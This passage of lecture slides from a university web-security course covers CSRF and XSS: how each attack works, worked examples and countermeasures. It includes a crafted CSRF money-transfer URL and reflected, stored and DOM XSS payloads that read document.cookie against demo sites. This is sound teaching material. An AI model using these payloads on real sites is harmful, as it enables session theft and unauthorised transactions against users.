  51. 51. Some web injections vulnerabilities CSRFCSRF IIICSRF: detailed steps 1. application logic discovery: the attacker craft a precise HTTP Request (including HTTP Headers, GET and/or POST parameters and values) that if run by another user will perform the actions the attacker desires 2. the victim has first to be authenticated 3. a malicious message is sent, for the request automatically to be performed when the user reads it (eg: HTML via IM, twitter, email...) 4. the victim runs that code inside its browser, and actions are performed without him noticing it Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 45/86 2011-2012 45 / 86
  52. 52. Some web injections vulnerabilities CSRF CSRF example I Aimelyne wants to trick Ilyas to receive 2000 USD from him via the website payme.wtf Application logic discovery A uses the payme.wtf for a small amount 5 USD to Melissa ... and discovers that the following request is performed:1 GET h t t p : / / payme . w t f / t r a n s f e r . do ? t o=M e l i s s a&amount=5 HTTP/ 1 . 1 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 46/86 2011-2012 46 / 86
  53. 53. Some web injections vulnerabilities CSRFCSRF example IIMalicious link constructionHow would A construct a malicious link so that people who will performthat request would (if authenticated) send here 2000 USD? Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 47/86 2011-2012 47 / 86
  54. 54. Some web injections vulnerabilities CSRFCSRF example IIMalicious link constructionHow would A construct a malicious link so that people who will performthat request would (if authenticated) send here 2000 USD?http://payme.wtf/transfer.do?to=Aimleyne&amount=2000 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 47/86 2011-2012 47 / 86
  55. 55. Some web injections vulnerabilities CSRFCSRF example IIITransmission to the victimHow would A send that link to the victim?A possible answer:The victim gets trickedAssuming Ilyas is authenticated, if he clicks the link, Aimelyne will receivethe money. What is the problem that now could occur? Answer: How to prevent that? A solution:7 7 We here assumed a GET request. POST request could also be tricked (eg:HTML form, input submission triggered via javascript) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 48/86 2011-2012 48 / 86
  56. 56. Some web injections vulnerabilities CSRFCSRF example IIITransmission to the victimHow would A send that link to the victim?A possible answer: email, instant messaging (eg: skype, gchat...)The victim gets trickedAssuming Ilyas is authenticated, if he clicks the link, Aimelyne will receivethe money. What is the problem that now could occur? Answer: Ilyas could notice that he just performed an action How to prevent that? A solution: force the HTTP GET request to be performed so that the user does not notice it. eg: very small iframe, img, script, css, flash ... basically anything a browser can load!7 7 We here assumed a GET request. POST request could also be tricked (eg:HTML form, input submission triggeredvulnerabilities and attacks Fabien Duchene (LIG) 4MMSR-3-Web via javascript) 48/86 2011-2012 48 / 86
  57. 57. Some web injections vulnerabilities CSRFCSRF countermeasures client side: Let the user to decide to perform a cross-site request [RequestPolicy firefox add-on], [CsFire firefox add-on] prevention redirections [Ryck et al. 2011] server side: for each form request, include a “fresh state token” (unaccepted request if replay attack) freshness requires a sufficient randomization eg. dependencies: user identity, session, time, webpage from which the request come from, form “status” ASP.Net: viewstate Java: Nothing out of the box, but ability to build it. OWASP CSRFGuard checking the HTTP header referer from which webpage does the request come from? is it the very same website or at least one that I do trust? limiting the lifetime of tickets (eg: cookies) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 49/86 2011-2012 49 / 86
  58. 58. Some web injections vulnerabilities XSS - Cross-Site scriptingX whaaat? IXSS (aka Cross Site Scripting) is a code injection vulnerability withinweb applications. Exploiting it allows an attacker to inject code (eg:html, javascript, flash...) and to run it in the visitor context (victim’sbrowser) in order to bypass access control mechanisms (eg:Same-Origin Policy) “Cross-site”: code from another source is run onto the attacked website. 12,885 XSS vulnerabilities reported in 2008 8 XSS starts with a X because... not to be counfonded with CSS XSS ... are executed on the client targets client side data eg: session cookies control Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 50/86 2011-2012 50 / 86
  59. 59. Some web injections vulnerabilities XSS - Cross-Site scriptingX whaaat? IIHow attackers do have fun? silently install a malware in your browser steal your session credentials (eg: cookies) use your browser as part of a botnethttp only: http://fd.the-wildcat.de/apache e36a9cf46c.phpSame origin policy security boundary based on the very same (fqdn, port, and protocol) only the very same “entity” can access for instance user credentials eg: https://ocarina.imag.fr/page1.py http://ocarina.imag.fr/page3.html http://ocarina.imag.fr:82/page5.php Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 51/86 2011-2012 51 / 86
  60. 60. Some web injections vulnerabilities XSS - Cross-Site scriptingX whaaat? IIICauses HTML mix content, control statements and formatting cross site requests allowed by default 8 [Symantec 2009] Symantec Global Internet Security Threat Report - trendsfor 2008 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 52/86 2011-2012 52 / 86
  61. 61. Some web injections vulnerabilities XSS - Cross-Site scriptingWhere can it be found? I any website processing arguments (HTTP GET, POST ...) mail.google.com [Amit 2010] Cross-Site Scripting through Flash in Gmail Based Services Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 53/86 2011-2012 53 / 86
  62. 62. Some web injections vulnerabilities XSS - Cross-Site scriptingWhere can it be found? II m.facebook.com [CrazyDaVinci 2011] Autopost Spamming using Facebook Mobile XSS Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 54/86 2011-2012 54 / 86
  63. 63. Some web injections vulnerabilities XSS - Cross-Site scriptingXSS classificationAccording to the minimal number of executed transitions (a couple ofSUT request + answer) type 0 XSS type 1 XSS / reflected / non-persistent: type 2 XSS / stored / persistent: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 55/86 2011-2012 55 / 86
  64. 64. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS / type 1 attack9 9 [IBM 2002] Cross-site scripting Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 56/86 2011-2012 56 / 86
  65. 65. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS / type 1 attackReflected XSS aka non-persistent / type 1 “easy” to trigger the most found in terms of number of vulnerabilities different from CSRF! why? Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 57/86 2011-2012 57 / 86
  66. 66. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS / type 1 attackReflected XSS aka non-persistent / type 1 “easy” to trigger the most found in terms of number of vulnerabilities different from CSRF! why? .. code execution on the client side! Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 57/86 2011-2012 57 / 86
  67. 67. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS - example I web application: online shop Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 58/86 2011-2012 58 / 86
  68. 68. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS - example II after submitting the form Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 59/86 2011-2012 59 / 86
  69. 69. Some web injections vulnerabilities XSS - Cross-Site scriptingReflected XSS - example III observe the HTTP Request parameters: What are their names and their assumed types? Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 60/86 2011-2012 60 / 86
  70. 70. Some web injections vulnerabilities XSS - Cross-Site scripting Reflected XSS - example III I attempt to inject in QTY1:1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )> try to inject another field. eg: field1 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 61/86 2011-2012 61 / 86
  71. 71. Some web injections vulnerabilities XSS - Cross-Site scripting Reflected XSS - example III II1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )>&QTY2=1&QTY3=1& QTY4=1& f i e l d 2 =4128+3214+0002+1999& f i e l d 1 =111<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( document . c o o k i e )>&SUBMIT=P u r c h a s e success! we are able to inject some code! here, we showed that we can steal the victim cookies we can transfer the crafted URL to the victim via: twitter, IM, email ... (even shorten it eg: bit.ly ) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 62/86 2011-2012 62 / 86
  72. 72. Some web injections vulnerabilities XSS - Cross-Site scripting Type 1 - XSS a formal definition I [Fabien Duchene 2012] Let q be the following extract of the SUT output:1 <a name=” [ USER INFLUENCED INPUT ] ”>Hola !</a> q = q1 + q2 + q3 :: GO : HTML grammar (actually depends WHERE we can inject: JS, Flash..) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 63/86 2011-2012 63 / 86
  73. 73. Some web injections vulnerabilities XSS - Cross-Site scriptingType 1 - XSS a formal definition IIExtract of the Parse Tree TG0 of the SUT output <a name A ATTR NAME = "::::::: kalimu" A LEFT A ATTR onclick ::::::: A ATTR ONC = :: "alert(1)" ::::::::: > Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 64/86 2011-2012 64 / 86
  74. 74. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS / type 2 attack I10 10 [IBM 2002] Cross-site scripting Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 65/86 2011-2012 65 / 86
  75. 75. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS interesting for browser worms impact more important (eg: Facebook wall) in brief: data stored on the server and displayed with only the victim interaction Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 66/86 2011-2012 66 / 86
  76. 76. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS - example I [WebGoat - the vulnerable web application] WebGoat - the vulnerable web application Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 67/86 2011-2012 67 / 86
  77. 77. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS - example II Login form Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 68/86 2011-2012 68 / 86
  78. 78. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS - example III Profile visualization Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 69/86 2011-2012 69 / 86
  79. 79. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS example Profile edition Any idea? Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 70/86 2011-2012 70 / 86
  80. 80. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS example Profile edition Any idea? Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 70/86 2011-2012 70 / 86
  81. 81. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS example I Now let us logon as Jerry Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 71/86 2011-2012 71 / 86
  82. 82. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS example II And check Tom’s profile: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 72/86 2011-2012 72 / 86
  83. 83. Some web injections vulnerabilities XSS - Cross-Site scriptingStored XSS example III P0wN3d! Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 73/86 2011-2012 73 / 86
  84. 84. Some web injections vulnerabilities XSS - Cross-Site scriptingDOM based XSS / type 0 attack IThe web-server does not receive the payload anymore Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 74/86 2011-2012 74 / 86
  85. 85. Some web injections vulnerabilities XSS - Cross-Site scriptingDOM based XSS / type 0 attack IIDOM XSS steps 1. searching for a valid URL on the website 2. searching for ways to run code within the browser from an URL load request without sending it to the server 3. sending to the victim for the malicious URL 4. the browser loads the legitimate webpage 5. and runs the payload (without something noticeable on the server side) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 75/86 2011-2012 75 / 86
  86. 86. Some web injections vulnerabilities XSS - Cross-Site scriptingDOM based XSS / type 0 attack IIICauses [Paola 2011] sources: input data controlled directly or not by the attacker sinks: potentially dangerous functions filters: operations on sources which change the content badly designed client filters focus on server side XSS detection, while this is a client problem Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 76/86 2011-2012 76 / 86
  87. 87. Some web injections vulnerabilities XSS - Cross-Site scriptingDocument Object ModelDOM? a tree permitting accessing in a programmatic way objectsthat are represented on a rendered webpage 11 11 [Document Object Model] Document Object Model Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 77/86 2011-2012 77 / 86
  88. 88. Some web injections vulnerabilities XSS - Cross-Site scripting DOM XSS example I Classic example from the original DOM-XSS paper [Klein 2005] “DOM Based Cross Site Scripting or XSS of the Third Kind” http://www.vulnerable.site/welcome.html 1 <HTML > <TITLE>Welcome!</TITLE> 3 Hi <SCRIPT> 5 v a r p o s=document . URL . i n d e x O f ( ”name=” ) +5; document . w r i t e ( document . URL . s u b s t r i n g ( pos , document . URL . l e n g t h )); 7 </SCRIPT> <BR> 9 Welcome t o o u r s y s t e m ...11 </HTML > Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 78/86 2011-2012 78 / 86
  89. 89. Some web injections vulnerabilities XSS - Cross-Site scripting DOM XSS example II normal usage: http://www.vulnerable.site/welcome.html?name=Sophie malicious crafted link:1 h t t p : / /www . v u l n e r a b l e . s i t e / welcome . h t ml ?name=S o p h i e#b l a b l a < s c r i p t > a l e r t ( document . c o o k i e ) ; </ s c r i p t > ... there are a lot of trickier stuff! Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 79/86 2011-2012 79 / 86
  90. 90. Some web injections vulnerabilities XSS - Cross-Site scriptingXSS counter-measures IInput sanitization client size: letting the user decide to run anything else than HTML eg: [NoScript] server side: “proxy/stub” between the http server and the clients filtering: only allow a subset of characters input and output filtering [HTMLPurifier], [AntiSamy project]... Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 80/86 2011-2012 80 / 86
  91. 91. Some web injections vulnerabilities XSS - Cross-Site scriptingXSS counter-measures II both: httpOnly [httponly] (on most modern browsers, not possible with document.cookie and XMLHTTPResponse, but still vulnerable if using XMLHTTPRequest)Stored offline search in databases: fastidious (encoding, patterns), response time?DOM Frozen-DOM [0x6D6172696F 2011] X-Content-SecurityPolicy [Paola 2011] Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 81/86 2011-2012 81 / 86
  92. 92. Appendix For Further Reading0x6D6172696F, Mario Heiderich (2011).Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradicatihttp://www.hackinparis.com/slides/hip2k11/02-LockingTheThroneRoom.pdf http://mario.heideri.ch.Amit, Yair (2010).Cross-Site Scripting through Flash in Gmail Based Services.http://blog.watchfire.com/wfblog/2010/03/cross-site-scripting-through-flash-in-gmail-based-services.html.CrazyDaVinci (2011). Autopost Spamming using Facebook Mobile XSS.http://crazydavinci.net/2011/03/autopost-spamming-using-facebook-mobile-xss/.Fabien Duchene Roland Groz, Sanjay Rawat Jean-Luc Richier (2012).XSS Vulnerability Detection Using Model Inference Assisted Evolutionary FuzHackipedia - SQL injection.http://hakipedia.com/index.php/SQL_Injection.Heiderich, Mario. HTML5 security. http://html5sec.org/. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 82/86 2011-2012 82 / 86
  93. 93. Appendix For Further ReadingIBM, Paul Lee (2002). Cross-site scripting. https://www.ibm.com/developerworks/tivoli/library/s-csscript/.Johan Adriaans, Pedro Laguna. Firefox hackbar add-on.https://addons.mozilla.org/en-US/firefox/addon/hackbar/.Klein, Amit (2005). “DOM Based Cross Site Scripting or XSS of the ThirdKind”. In:http://www.webappsec.org/projects/articles/071105.shtml.Kunz, Benjamin (2011).Skype Vulnerabilities: Zero Day Exploitation 2011, HITBSecConf 2011 (Malahttp://conference.hitb.org/hitbsecconf2011kul/?page_id=1757.Maone, Giorgio. NoScript.https://addons.mozilla.org/en-US/firefox/addon/noscript/.Mavituna - SQL injection sheet (2007).http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.OWASP. AntiSamy project. https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.— httponly. https://www.owasp.org/index.php/HTTPOnly. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 83/86 2011-2012 83 / 86
  94. 94. Appendix For Further ReadingOWASP. WebGoat - the vulnerable web application. https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project.— (2011). Injection - OWASP top 10 - 2010.https://www.owasp.org/index.php/Top_10_2010-A1.Paola, Stefano Di (2011). DOM Xss Identification and Exploitation.http://media.hacking-lab.com/scs3/scs3_pdf/SCS3_2011_Di_Paola.pdf.Philippe De Ryck, Lieven Desmet. CsFire firefox add-on.https://addons.mozilla.org/en-US/firefox/addon/csfire/.RSnake. XSS. http://ha.ckers.org/xss.html.Ryck, Philippe De et al. (2011). “Automatic and Precise Client-SideProtection against CSRF Attacks”. In: https://lirias.kuleuven.be/bitstream/123456789/311551/1/paper.pdf.ESORICS.Samuel, Justin. RequestPolicy firefox add-on. https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 84/86 2011-2012 84 / 86
  95. 95. Appendix For Further ReadingSymantec (2009).Symantec Global Internet Security Threat Report - trends for 2008.http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf.Wassermann, Gary Michael (2008).Techniques and Tools for Engineering Secure Web Applications. Ph.D.thesis.Webgoat - numeric SQL injection.http://yehg.net/lab/pr0js/training/view/owasp/webgoat/WebGoat_InjectionFlaws_NumericSQLInject/WebGoat_InjectionFlaws_NumericSQLInject.html.Wikipedia. Document Object Model.https://secure.wikimedia.org/wikipedia/en/wiki/Document_Object_Model.Yang, Edward Z. HTMLPurifier. http://htmlpurifier.org/. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 85/86 2011-2012 85 / 86
  96. 96. Bonus slides XSSAlso see Some tricks to escape browser protections [XSS] [HTML5 security] Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 86/86 2011-2012 86 / 86

×